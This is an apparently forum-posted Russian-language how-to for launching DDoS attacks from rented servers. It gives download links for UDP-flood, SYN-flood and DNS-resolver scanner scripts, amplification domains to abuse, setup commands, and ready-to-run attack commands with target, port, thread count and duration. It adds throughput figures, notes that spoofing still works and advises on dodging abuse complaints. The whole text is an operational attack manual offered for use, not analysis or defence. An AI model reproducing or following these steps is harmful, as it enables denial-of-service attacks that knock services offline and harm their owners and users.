Нам понадобится: - SSH клиент, для отдачи команд серверам. Рекомендую xshell Скачать: http://www.netsarang.com/download/down_xsh.html - FTP клиент, что бы распределять днс листы по серверам, любой который вам нравится. Можно юзать wget, но когда серверов много через фтп клиент удобнее - Утилитка для разделения txt файла на части. Я использовал split Скачать: http://www.sendspace.com/file/4ai08a SaveFrom.net - Собственно сами скрипты udp, syn и сканнер открытых днс резолверов для udp amplification Скачать: http://www.sendspace.com/file/bfgifw SaveFrom.net - Ну и конечно сами сервера. Например http://ecatel.co.uk/ любимый всеми ддосерами. На серверах по 155 евро спуффинг благо еще работает. Покупаем centos или debian 64 bit, без панели управления. Она нам не нужна, нам нужен только ssh. В конце мануала я еще дам ссылки на хостеров у которых можно арендовать нужные сервера. Ну вот, предположим вы купили сервер. Коннектимся к нему через ssh клиент. Сначала установим glibc необходимый для работы скриптов: yum install glibc.i686 если centos apt-get install glibc.i686 если debian Далее заливаем udp, syn и scan на сервер через фтп клиент или wget http://host.com/udp и тд. Ставим на них права 777 в фтп клиенте или chmod -R 777 syn На этом пока все, теперь переходим к днс листам. Для udp amplification нам понадобятся списки открытых днс резолверов с нужным нам ответом от них. Благо хостеру ecatel абсолютно похуй чем вы занимаетесь на своих серверах, поэтому можно смело сканить прямо с них. В других датацентрах я бы не советовал так делать, потому что большинство абуз приходят как раз таки за ****. И вообще что бы насканить лист хватит какой нибудь впски с 100 мбит каналом. На каждый сервер нужно примерно 20к днсок, которые мы насканим при помощи скрипта scan. Учтите что на каждый сервер нужен отдельный лист, поэтому если у вас несколько серверов, мы насканим один большой лист и распилим его на нужное количество частей. Пример использования: ./scan 1 99999 list.txt 3 admin.gull.ca 3800 Где: 1 - начало диапазона 99999 - конец диапазона list.txt - файл куда будут сохранятся днски 3 - количество потоков, 3 как раз на гигабитный канал admin.gull.ca - домен для скана с кучей А записей 3800 - размер ответа в байтах. Мануал по тому как сделать свой домен для скана я приложу чуть позже в дополнение к этому мануалу, а пока домены берем халявные у этих пидоров: http://dnsamplificationattacks.blogspot.com/ Проверяем их командой dig: dig A admin.gull.ca или dig ANY admin.gull.ca Если ответ 3800+ - смело сканим на этот домен. И так с этим разобрались, у нас есть готовый list.txt c днсками внутри. Теперь нужно распилить его утилиткой split на нужное количество частей. Например лист получился 10598412 байт, нужно 3 листа на 3 сервера. Запускаем через cmd: split list.txt 3532804 И утилитка порежет list.txt на куски по 3532804 байт, то есть на 3 равные части. Теперь берем эти листы и распределяем по серверам. Можете другой утилиткой это делать, главное принцип понятен. Готово? Можно ддосить smile.gif Udp flood запускаем так: ./udp 121.2.2.10 80 list.txt 99 1000 80 - порт list.txt - лист наш естественно 99 - количетсво потоков, больше 100 ставить не рекомендую 1000 - длительность атаки в секундах Syn flood запускаем так: ./syn 121.2.2.10 21 100 -1 1000 21 - порт 100 - количество потоков, больше 100 тоже не стоит ставить -1 - лимит pps, то есть -1 это без лимита 1000 - длительность атаки в секундах Один сервер генерирует около 10-11 гбит udp траффика и около 1 млн pps syn пакетов. Это именно для серверов ecatel. В других датацентрах ппс и гигабиты на выходе могут отличаться. Использовать сервера в разы эффективнее и дешевле обходится чем содержание большого ботнета. Да, все делается ручками, это вам не штормбот biggrin.gif. Зато на халяву